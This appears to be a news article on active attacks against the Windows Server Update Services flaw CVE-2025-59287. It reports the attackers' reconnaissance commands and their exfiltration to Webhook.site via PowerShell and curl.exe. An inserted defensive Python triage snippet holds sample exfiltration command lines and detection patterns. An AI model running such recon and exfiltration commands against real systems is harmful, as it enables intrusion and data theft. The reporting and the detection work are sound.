WSUS attacks hit ‘multiple’ orgs as Google and other infosec sleuths ring Redmond’s alarm bell
More threat intel teams are sounding the alarm about a critical Windows Server Update Services (WSUS) remote code execution vulnerability, tracked as CVE-2025-59287 and now under active exploitation, just days after Microsoft pushed an emergency patch and the US Cybersecurity and Infrastructure Security Agency added the bug to its Known Exploited Vulnerabilities catalog.
Microsoft hasn’t updated its advisory for the flaw to note the active in-the-wild exploitation detected by multiple credible sources. Redmond instead lists CVE-2025-59287 as neither publicly disclosed nor exploited. The software giant does rate the bug as “exploitation more likely,” which may be the understatement of the month.
“We are actively investigating the exploitation of CVE-2025-59287 by a newly identified threat actor we are tracking as UNC6512, across multiple victim organizations,” Google Threat Intelligence Group (GTIG) said in an email, in response to The Register’s questions.
“Following initial access, the actor has been observed executing a series of commands to conduct reconnaissance on the compromised host and the associated environment,” GTIG continued. “We have also observed exfiltration from impacted hosts.”
Microsoft declined to answer The Register’s questions about reported attacks but pointed out it does not typically update security advisories post-release unless its initial post was inaccurate.
CVE-2025-59287, which affects Windows Server versions 2012 through 2025, stems from insecure deserialization of untrusted data and allows unauthenticated attackers to execute arbitrary code on vulnerable systems. Servers without the Windows Server Update Services (WSUS) role enabled aren’t affected.
Microsoft initially issued a fix for CVE-2025-59287 on October’s Patch Tuesday, but it didn’t fully patch the security hole. Late last Thursday, Redmond pushed an emergency update.
Within hours of the emergency fix, incident responders and threat researchers started seeing active exploitation.
“We are seeing about 100,000 hits for exploitation of this bug within the last seven days based on our telemetry,” Dustin Childs, Trend Micro’s Zero Day Initiative head of threat awareness, told The Register.
“Our scans show that there are just under 500,000 internet facing servers with the WSUS service enabled,” Childs continued. “Due to the nature of the bug, we expect just about every affected server to be hit at some point. However, what exploitation we are seeing seems indiscriminate and not targeted at a specific sector or region. We also expect to see the rate of compromise increase over time unless patches and other remediations are implemented.”
‘Catastrophic’ potential for downstream victims
Also as of Monday, Palo Alto Networks’ Unit 42 team “observed limited impacted customers,” Justin Moore, Unit 42 senior manager of threat intel research, told The Register.
“While WSUS by default shouldn’t be accessible via the internet, in cases where it is exposed, the potential is catastrophic for downstream entities,” he added.
Unit 42’s analysis to date indicates that the unknown attackers exploiting the Microsoft flaw remain focused on gaining initial access and performing internal network reconnaissance.
The attackers target publicly exposed WSUS instances on their default TCP ports, 8530 (HTTP) and 8531 (HTTPS).
And once they’ve broken in, they execute PowerShell commands and hoover up data about the internal network environment, including whoami, net user /domain, and ipconfig /all. Then they exfiltrate the stolen details to a remote, attacker-controlled Webhook.site endpoint using a PowerShell payload that attempts Invoke-WebRequest and falls back to curl.exe if needed, according to Unit 42.
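As a defender-side illustration of the activity Unit 42 describes (added here; not code from the article, Unit 42 or Microsoft), the following Python triages constructed process-creation events for shells spawned by WSUS-related processes that run those reconnaissance commands or reach a Webhook.site endpoint. The parent process names w3wp.exe and WsusService.exe are assumptions about how WSUS is hosted, and the Webhook.site ID is a placeholder.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style field
# names). Assumption: WSUS handles requests via IIS (w3wp.exe) and its own
# WsusService.exe, so a shell with either as parent is unexpected.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami && net user /domain && ipconfig /all"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest https://webhook.site/PLACEHOLDER-ID"},
    {"ParentImage": r"C:\Windows\explorer.exe",          # benign: user-launched shell
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},
    {"ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "Image": r"C:\Windows\System32\curl.exe",           # the curl.exe fallback path
     "CommandLine": "curl.exe -X POST https://webhook.site/PLACEHOLDER-ID -d @out.txt"},
]

WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe"}
# Recon commands named in the article and the exfil indicators it describes.
RECON = re.compile(r"\b(whoami|net\s+user\s+/domain|ipconfig\s+/all)\b", re.I)
EXFIL = re.compile(r"(webhook\.site|invoke-webrequest|curl\.exe)", re.I)


def basename(path):
    """Last path component, lower-cased, so comparisons ignore install location."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the set of tags for one event; an empty set means nothing matched."""
    tags = set()
    if basename(event["ParentImage"]) in WSUS_PARENTS and basename(event["Image"]) in SHELLS:
        tags.add("wsus-spawned-shell")
        cmdline = event.get("CommandLine", "")
        if RECON.search(cmdline):
            tags.add("recon")
        if EXFIL.search(cmdline):
            tags.add("exfil")
    return tags


def triage(events):
    """Index and sorted tags of every event that matched at least one rule."""
    return [(i, sorted(classify(e))) for i, e in enumerate(events) if classify(e)]
```

A single match on "wsus-spawned-shell" is already worth a look, since WSUS has no business launching cmd, PowerShell or curl.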
“Considering this is an unauthenticated vulnerability with low attack complexity, the scope of exploitation may appear initially low on the surface due to the relatively limited number of exposed WSUS servers,” Moore said. “However, the actual downstream effects could be great yet difficult to assess.”
Moore said the team doesn’t yet have any evidence indicating a specific attacker or threat group is responsible for attacks on the flaw. But “when a vulnerability with ease of attack and a proof-of-concept is available, any opportunistic threat actors will capitalize,” he noted.
At least one proof-of-concept has been available since at least October 21.
“We’ve only observed system information being exfiltrated thus far, but ultimately the goal would be to utilize the compromised server to push malicious software to enterprises via the update service for maximum effect,” Moore said.
On Patch Tuesday, Childs warned that it was very likely miscreants would soon target this bug. That view was prescient, and on Monday Childs told us: “The fact that the initial patch was bypassed is disconcerting for several reasons.”
“I called this CVE out on my blog because I saw what potential an exploit could cause,” he said. “It’s something that threat actors look for when deciding to reverse engineer patches. It’s normally difficult to find bugs – unless it’s Patch Tuesday, where Microsoft tells you what bugs exist. If the patch doesn’t fully address the vulnerability, the existence of a patch actually increases the risk to enterprises. It leads people to think they are protected when in fact they aren’t.”
Microsoft has problems with patches that don’t fully fix flaws, he added. Remember SharePoint?
“We need to start holding them accountable not only for the patches that break functionality,” Childs said, “but also for the patches that don’t fix the security issues they document.” ®